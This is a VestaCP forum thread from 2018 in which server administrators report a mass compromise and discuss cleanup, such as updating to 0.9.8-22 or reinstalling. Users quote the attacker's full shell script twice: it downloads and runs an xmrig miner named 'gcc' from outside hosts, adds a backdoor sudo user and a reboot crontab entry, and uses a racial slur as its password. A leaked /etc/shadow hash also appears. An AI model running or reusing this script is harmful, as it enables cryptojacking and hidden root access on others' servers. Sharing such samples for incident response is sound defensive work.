We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
have been HACKED ! by xaxaxa.eu
Re: have been HACKED ! by xaxaxa.eu
Like thread owner has informed in his first post, the following script was executed:Spheerys wrote: ↑Tue Jun 26, 2018 7:21 amA new line was added to /etc/passwd :And /etc/group :Code: Select all
sysroot:x:1007:1008::/home/sysroot:/bin/sh
and /etc/gshadow :Code: Select all
sysroot:x:1008:
and /etc/subuid :Code: Select all
sysroot:!::
and /etc/shadow :Code: Select all
/etc/sudoers (sic!!) :Code: Select all
sysroot:$6$A7jC1gBu$3kMVa4OoMDiyw8zLX7Y9X7kmyUNH9cbR6x6tSeNATJ.NlXEBE/DdFnKFCryHJAxHFOIFkUQmyKodtHLJH.QF.:17708:0:99999:7:::
Code: Select all
sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL sysroot ALL=(ALL) ALL
Code: Select all
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa.eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Re: have been HACKED ! by xaxaxa.eu
I've updated the system without errors. But still i'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?
Re: have been HACKED ! by xaxaxa.eu
did you tried to upgrade like i wrote? -> viewtopic.php?f=10&t=17183#p71558
If yes, please share the output of ./v-list-sys-vesta-updates.
Re: have been HACKED ! by xaxaxa.eu
In my case :
Code: Select all
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-26
vesta-php 0.9.8 21 amd64 yes 2018-05-25
vesta-nginx 0.9.8 21 amd64 yes 2018-05-25
Re: have been HACKED ! by xaxaxa.eu
you're up to date, good so far. now you need to clean your server - my point of view: Do not trust a infected server anymore. Better install a new one and migrate the users there.Spheerys wrote: ↑Tue Jun 26, 2018 7:31 amIn my case :Code: Select all
PKG VER REL ARCH UPDT DATE --- --- --- ---- ---- ---- vesta 0.9.8 22 amd64 yes 2018-06-26 vesta-php 0.9.8 21 amd64 yes 2018-05-25 vesta-nginx 0.9.8 21 amd64 yes 2018-05-25
Re: have been HACKED ! by xaxaxa.eu
yes you are right.
Thanks !
Thanks !
Re: have been HACKED ! by xaxaxa.eu
Dear team,
We have around 120+ Servers running in Various DATA CENTERS across the world . out of these 110 Server have vestacp Installed. All the 110 Servers with vestacp installed is hacked for cpu concurrency mining by some unknown hacker.
hacker Installed xmrig minig software on our servers.
some servers also have a script called 'gcc' installed.
how can we get rid of this issue.
Regards
We have around 120+ Servers running in Various DATA CENTERS across the world . out of these 110 Server have vestacp Installed. All the 110 Servers with vestacp installed is hacked for cpu concurrency mining by some unknown hacker.
hacker Installed xmrig minig software on our servers.
some servers also have a script called 'gcc' installed.
how can we get rid of this issue.
Regards
Re: have been HACKED ! by xaxaxa.eu
also was hacked tonight by mining virus
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Re: have been HACKED ! by xaxaxa.eu
I did exactly as you wrote.ScIT wrote: ↑Tue Jun 26, 2018 7:29 am
did you tried to upgrade like i wrote? -> viewtopic.php?f=10&t=17183#p71558
If yes, please share the output of ./v-list-sys-vesta-updates.
Code: Select all
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 amd64 no 2018-04-09
vesta-php 0.9.8 19 amd64 no 2018-01-23
vesta-nginx 0.9.8 20 amd64 no 2018-04-09
Re: have been HACKED ! by xaxaxa.eu
1. Update to actual patch level (0.9.8-22), this will fix the security issue but does .pksh71 wrote: ↑Tue Jun 26, 2018 7:57 amDear team,
We have around 120+ Servers running in Various DATA CENTERS across the world . out of these 110 Server have vestacp Installed. All the 110 Servers with vestacp installed is hacked for cpu concurrency mining by some unknown hacker.
hacker Installed xmrig minig software on our servers.
some servers also have a script called 'gcc' installed.
how can we get rid of this issue.
Regards
2. In my point of view: Don't trust infected servers, so reinstall them. If you don't want to reinstall try to clear the system.